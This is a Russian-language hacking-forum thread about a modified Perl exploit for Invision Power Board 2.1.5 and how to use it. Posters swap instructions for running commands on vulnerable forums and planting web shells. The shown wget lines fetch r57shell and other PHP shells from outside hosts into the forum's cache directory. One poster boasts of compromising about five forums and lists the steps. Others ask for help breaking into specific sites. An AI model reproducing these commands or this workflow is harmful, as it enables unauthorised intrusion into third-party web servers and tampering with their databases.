![]() |
IPB 2.1.5 RST (DimaHbl4 edition)
Вот я тут сплойт от RST поправил, в котором higlite.
Не забываем отписыватся..... И благодарить в виде +. Код:
#!/usr/bin/perl |
# milw0rm.com [2006-04-26] О_о
или моя чтонить непонимать? зы: ты код от киддисов поправил? |
Цитата:
И зачем? |
выдели другим цветом тот отрезок кода, который ты поправил.
|
Цитата:
|
Цитата:
Для 2ух целей : 1. Руками много форумов не уделаешь..... Устаешь. 2. Для тех кто руками не могет. Код:
#!/usr/bin/perlP.S Подумаешь копирайт milw0rm не убрал... А че никто не отписывается? |
exploit с ним чето не в порядке =)
Кароче вроде хеши получаю но тему не создает =)
Вот скрин http://cmd.interwave.ru/cmd.bmp |
CMD
Рядом с надписью "Command for execute or 'exit' for exit" нужно вводить команду, а не просто жжать Enter. |
И какие команды вводить перепробывал все нифига он на 2.1.5 работает ?
|
Я тестил на 2.1.4
|
Жаль что не 2.1.5.
А я уже так надеялся =) Мне кароче надо чуток в их базе поправить а не как не выходит =) |
ты ручками юзай чтоб катило =)
на 2.0.1 у кого нибудь прокатывало ? |
Да, минус ставить не надо было...) Тогда бы просто + не ставил, раз не считаешь нужным.
Цитата:
|
[sL1p]
Цитата:
|
Да, конечно понимаю. Это подразумевается. Но явно так это писать не стоит. Тогда наоборот пропадает желание поставить +. Сужу по себе, не знаю как у других с этим делом. Всё, флейм off. Больше здесь не пишу. Остальное, если надо, то через ПМ.
|
Я то поменял - на + но хватит репу клянчить а то в следующий раз не сниму !
|
Nova
Только что это обсудили это выше с [sL1p]. Все забыли, проехали.... |
Можеш написать команды которые у тебя работали ?
|
Все......
Проверено на командах pwd ls (и все его разновидности типа ls -l) curl wget Мне больше и не надо, этого вполне достаточно чтоб залить шелл. N.B. Когда урл копируешь по которому пройти надо, смотри внимательней, т.к. в консоле он на разных строчках, и в этих местах образуется пробелы. Совет.......Сначала этот урл скопируй в блокнот убери 1 пробел потом ткни END и нажми Delete, потом опыть повтори эту операцию. |
Нипонимаю тейстил на многих форумах пишет месанджаре креаче (ФАйлед)
Начинает уже бесить =) |
CMD
Ты пойми что на некоторых форумах создание сообщения запрещено в опредленном топике....Или пока ты не активизируешся. Лично я при помощи этого сплойта около 5 форумов заимел. 3 шага к успеху: 1)Заходи на форум регимся. 2)Через сплойт узнаем путь (команда pwd) 3)Льем шелл в путь/cache Вот и все. |
DimaHbl4 Если ты так всем нравишся тогда я тебе тоже репу подниму :-)
|
http://gamescenter.ru/index.php?show...st=0&#entry987Вот только это бойда вышла и то при нагрузке на базу я в 6 окон твоим exploit'ом фигачил =)
|
Там версия 2.1.5 на ней не работает..... Или она проста пропатчена на эту дырку.
Я ж тебе писал что тестил на 2.1.4 |
Цитата:
твой RST и на 2.1.3 непашет (проверял только на нормальных форумах). Этот баг только на чистых форумах пашет. |
Ахтунг!!!Пацаны...подскажите плз....как заоить шелл...???с помощью какой команды?И поподробней плз=))
И ещё....вот когда я пишу команду pwd , прохожу по ссылке , и у меян там какой то код появляецо...чё с ним делать?куда пихать? :confused: |
Дайте мне хоть 1 ссылку на форум где этот код работает +)
У всех норм форумах авторизация. |
Все я разобрался он и на 2.1.5 работает спосибо всем кто помог.
Баг в том что он не работает на чётных темах работает только на нечетных =) Осталось найти нормальный шел =) |
А куда лучше заливать r57 shell а то через аваторку не катит =)
|
народ плиз обьясните попподробнее че дальше делать? я начинающий и поэтому сильно ногами не пинайте! очень хочеться чтобы получилось!
вот что я имею: http://img61.imageshack.us/img61/9120/1232ud.jpg а дальше что делать не пойму :( близ обьясните! |
как пользоватся wget вот это правильная команда ?
Command for execute or 'exit' for exit wget http://rst.void.ru/download/r57shell .txt -O /cache/r57.php |
|
Незнаю чето не получается может нельзя загружать r57.php ? пробывал грузить в разные паки как говорится нифига..............
|
Когда я загружу шел ченить должно выдать ? а то у меня появляется чистая страница
|
Цитата:
|
Цитата:
|
Цитата:
зацените я сначало обрадовался потом проверил веселело и вчем тут прикол ? |
я пробовал заливать шелл
командой wget -o /home/serge/brunets/forum/1.php http://fudobat.narod.ru/1.php в результате шелл залился но не совсем нормально создались два файла 1.php и 1.php.1 в первом weget что то расказывает о скорости заливки и.т.п :) вот его содержание --05:59:56-- http://fudobat.narod.ru/1.php => `1.php.1' Resolving fudobat.narod.ru... 213.180.199.27 Connecting to fudobat.narod.ru[213.180.199.27]:80... connected. HTTP request sent, awaiting response... 200 OK Length: 106,099 [application/octet-stream] 0K .......... .......... .......... .......... .......... 48% 40.80 KB/s 50K .......... .......... .......... .......... .......... 96% 35.00 KB/s 100K ... 100% 9.63 KB/s 06:00:04 (34.20 KB/s) - `1.php.1' saved [106,099/106,099 1.php.1 является собственно шеллом как изменить команду чтобы шелл загружался без всяких излишеств |
Зачем полный путь указываешь?? Зайди в папку любую пропиши wget www.lo.ru/shell.php. И всё. А про твою команду командой wget -o /home/serge/brunets/forum/1.php http://fudobat.narod.ru/1.php. Имхо писать надо так командой wget -o /home/serge/brunets/forum/ http://fudobat.narod.ru/1.php.
|
или выполни щас команду: mv 1.php.1 1.php
|
| Время: 23:29 |